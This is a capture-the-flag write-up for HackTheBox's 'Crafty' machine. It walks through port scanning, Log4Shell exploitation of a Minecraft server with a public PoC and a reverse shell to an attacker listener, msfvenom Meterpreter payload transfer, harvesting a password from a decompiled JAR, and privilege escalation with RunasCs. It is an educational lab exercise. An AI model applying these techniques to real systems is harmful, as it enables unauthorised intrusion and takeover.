Crafty
Crafty writeup by Thamizhiniyan C S
Last updated
Was this helpful?
Crafty writeup by Thamizhiniyan C S
Last updated
Was this helpful?
Greetings everyone,
In this write-up, we will tackle Crafty from HackTheBox.
Machine link: Crafty Machine
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
nmap -p- -T4 -Pn <TARGET_IP>
nmap -A -p 80,25565 -v -Pn <TARGET_IP>
80
HTTP
Microsoft-IIS httpd 10.0
25565
Minecraft
Minecraft 1.16.5
First, let's take a look at the website running on port 80.
When attempting to access view port 80, it redirects to the domain crafty.htb. Therefore, to access the website, we need to append an entry to the /etc/hosts file, mapping the domain to the target IP address.
Command: sudo vim /etc/hosts
Now we have access to the website. I used Wappalyzer to check the technologies employed, but nothing of particular interest was discovered.
A subdomain, play.crafty.htb, was mentioned on the website. To access it, append another entry to the /etc/hosts file.
However, upon attempting to access it, it redirected back to crafty.htb.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.crafty.htb/
Indeed, it seems that there wasn't anything noteworthy discovered on the website.
Next, I began the process of enumerating the Minecraft server running on port 25565. I conducted a Google search to identify potential vulnerabilities and exploits specifically targeting Minecraft server version 1.16.5. Here's what I found:
CVE-2021-44228 is a security vulnerability in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability, also known as Log4Shell, allows attackers to execute malicious code remotely by exploiting a flaw in the library's JNDI (Java Naming and Directory Interface) lookup mechanism.
Based on the information provided in the article, it appears evident that the Minecraft Server running on the target is vulnerable to CVE-2021-44228, as it utilizes the Log4j library.
Next, I proceeded to search for exploits and proofs of concept (PoCs) for this vulnerability and came across the following:
The script provided in the repository sets up an HTTP server and an LDAP server for you. Additionally, it generates a payload that you can insert into the Minecraft game or client.
When you paste the crafted payload into the Minecraft client, it connects back to the HTTP server hosted by the script. This server then references the exploit hosted by the LDAP server within the script. Upon successful execution of the exploit, a reverse shell is established, connecting back to a listener on your attacker machine. This process allows you to gain control over the target system.
I cloned the above mentioned repository using Git.
To set up the environment for the exploit to run, I first created a virtual environment using Python. Then, I installed the necessary dependencies mentioned in the requirements.txt file.
python3 -m venv venv
source ./venv/bin/activate
Next, it's time to install the dependencies.
To obtain the required Java SDK version as specified in the readme file of the repository, please follow the instructions provided in the repository's README file: Getting the Java Version.
Extract the downloaded file.
Check whether you have installed the SDK correctly, by veryfing its version.
Now, rename the sdk folder as mentioned in the repository.
While examining the poc.py file to determine the required arguments for running the exploit, I noticed a variable named cmd with the value "/bin/bash" specified on line 26. It appears that the exploit was designed for a Linux target. However, since our target is a Windows machine (running Microsoft IIS server), we should modify the value to "cmd.exe" in order to obtain the shell.
We have successfully set up the environment for the exploit to run.
We require either the Minecraft game itself or a Minecraft client to connect to the Minecraft server running on the target. For this purpose, I've decided to utilize PyCraft, a Minecraft Python Client Library.
First clone the repository.
Next install the dependencies.
We have successfully set up PyCraft.
Since the exploit establishes a reverse shell back to our host, we need to set up a netcat listener on our attacking machine to receive the reverse shell. We will configure the netcat listener to listen on port 9001.
First let's start the HTTP and LDAP server.
python3 poc.py --userip <HTB_TUN_IP/Attacker_IP> --webport 25565 --lport 9001
The highlighted text depicted in the image above represents the crafted payload.
Next, connect to the Minecraft server using PyCraft. Enter a random username, leave the password field empty, and input the IP address of the target machine in the Server host field. Then, paste the payload and press enter once connected to the server.
Now, check the HTTP server hosted by the poc.py script. You'll notice that we have received a request from the Minecraft server, and the script has referred to the exploit accordingly.
Now, check the netcat listener. You'll observe that the reverse shell has successfully connected to the listener, and you can see the command prompt from the target machine. This indicates that we have successfully executed the attack and gained access to the target machine.
I found the user.txt file located at C:\Users\svc_minecraft\Desktop directory.
As I was navigating through the directories on the target machine, I found that there was nothing noteworthy in the logs folder and other files. However, I came across a suspicious file named playercounter-1.0-SNAPSHOT.jar in the C:\Users\svc_minecraft\plugins\ directory.
To examine that file, we need to download it to our attacker machine. Initially, I attempted to start an HTTP server from the target machine, but the firewall blocked it, and we don't have the necessary permissions to override it. Therefore, I opted to use Meterpreter to download the file instead.
To create a Meterpreter reverse shell using msfvenom, we first need to select a payload. To do this, we must determine the target machine's architecture. We can retrieve the processor architecture by executing the command "echo %PROCESSOR_ARCHITECTURE%" in the command prompt.
Now we know that the target machine's architecture is x64, it's time to generate the reverse shell using msfvenom.
We have successfully created the reverse shell.
To set up a listener for the reverse shell to connect back, open msfconsole and enter the following commands:
Now its time to start the listener.
Let's create a simple http python server to transfer the reverse shell from out attacker machine to the target machine.
While in the shell of the target machine, switch to PowerShell using the command "powershell", then type the following command to download the reverse shell.
You can see that we have successfully transferred the reverse shell to the target machine.
Now its time to execute the reverse shell.
Check the listener in msfconsole. You can see the meterpreter session.
Now switch the plugins directory.
Use the download command to download the jar file from the target machine.
Now we have successfully downloaded the file to our attacker machine.
To view the contents of the JAR file, we require a Java decompiler. Jadx-GUI is one of the recommended decompilers available.
Clone the mentioned repository.
Now build the JADX-GUI tool.
After the build process is complete, navigate to the build/jadx/bin directory and run the JADX-GUI application.
Now open the jar file.
After inspecting the contents and code of the JAR file, I came across a string that appears to resemble a password.
The password we found might be the Administrator's password.
Since we've obtained the Administrator's password (albeit through a guess), we can attempt to escalate our privileges using common Windows privilege escalation techniques. One such method involves utilizing the built-in runas command in Windows, which is somewhat equivalent to the sudo command in Linux, allowing us to run processes with elevated privileges.
To know more:
In this scenario, I will utilize the RunasCs tool, an improved version of the default Windows runas.exe program.
You can download the latest version of RunasCs from here: https://github.com/antonioCoco/RunasCs/releases
Our objective is to leverage the RunasCs tool to execute a reverse shell as Administrator, utilizing the password we discovered.
We can employ the same reverse shell that we've previously uploaded to the target machine. However, I've created a new reverse shell on a different port to ensure that the previous session remains undisturbed for backup.
Now, set up the second listener in another terminal within msfconsole.
Now, it's time to upload the RunasCs.exe and the second reverse shell to the target machine using the previously obtained Meterpreter shell.
Type the command "shell" to open the command prompt from the Meterpreter session, then execute the RunasCs.exe application to run the reverse shell with elevated privileges.
Now, check the second Meterpreter session for the reverse shell with elevated privileges.
You can get the root flag at C:\Users\Administrator\Desktop directory.
We have successfully obtained the user and root flag.
Thank You.....
